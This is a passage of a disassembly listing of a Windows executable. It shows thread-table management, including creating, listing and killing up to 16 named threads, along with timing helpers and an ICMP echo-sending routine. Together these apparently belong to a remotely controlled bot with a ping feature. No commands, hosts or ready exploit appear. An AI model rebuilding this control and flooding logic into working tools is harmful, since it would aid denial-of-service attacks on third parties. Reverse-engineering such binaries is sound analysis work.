call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: sub_408B30:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, dword_41E2D0
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call ds:dword_4170D0 ; GetTickCount
sub eax, dword_41E2D0
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: sub_4167F1+D5�p
push ebp
mov ebp, esp
and dword_41E2F0, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov dword_41E2F8, eax
push offset dword_41E2D8
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093B6 proc near ; DATA XREF: sub_409479+35�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_1C], eax
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push [ebp+var_20]
call ds:dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp dword_41DE38, 0
jz short loc_40942F
push [ebp+var_20]
push offset dword_419474
push offset dword_41DAB4
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: sub_4093B6+62�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_4093B6+59�j
push [ebp+var_1C]
call [ebp+var_20]
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: sub_4093B6:loc_40942F�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_409466: ; CODE XREF: sub_4093B6+91�j
xor eax, eax
loc_409468: ; CODE XREF: sub_4093B6+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4093B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: sub_40764D+14A�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset sub_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call ds:dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094E6 proc near ; DATA XREF: sub_4095A4+159�o
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, byte_41DE30
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp+var_1A0], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_0]
mov eax, [ebp+arg_0]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp+var_1A4], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1A4]
jmp short loc_409593
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_409593: ; CODE XREF: sub_4094E6+8A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4094E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp dword_41E2F0, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, dword_41E2F0
inc eax
mov dword_41E2F0, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset sub_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: sub_401244+73�p
; sub_401244+547�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2D8
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call ds:dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD5 proc near ; DATA XREF: sub_409BF1+2A�o
var_1A8 = byte ptr -1A8h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
cmp dword_41E2F0, 0
jz short loc_409B25
push 10h
push dword_41E2F0
push offset dword_4194EC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: sub_409AD5+30�j
push offset dword_4194CC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: sub_409AD5+4E�j
push offset dword_41E2D8
call sub_409C6C
pop ecx
and [ebp+var_10], 0
and [ebp+var_4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: sub_409AD5:loc_409BDB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409B5B: ; CODE XREF: sub_409AD5+7D�j
cmp [ebp+var_4], 10h
jge short loc_409BE0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E2D8
call sub_409C7A
pop ecx
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
push [ebp+var_4]
push offset dword_4194BC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: sub_409AD5+A0�j
; sub_409AD5+102�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: sub_409AD5+8A�j
; sub_409AD5+104�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: sub_409AD5+65�j
leave
retn 4
sub_409AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset sub_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp dword_41DE40, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call dword_41DE40 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call ds:dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: sub_40332B+10�p
; sub_41113B+7ED�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: sub_409DD0+202�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call dword_41E2FC
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2 ; ??2@YAPAXI@Z
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2 ; ??2@YAPAXI@Z
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call dword_41E308
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
call ds:dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call dword_41E304
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; DATA XREF: sub_40A1A7+FD�o
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
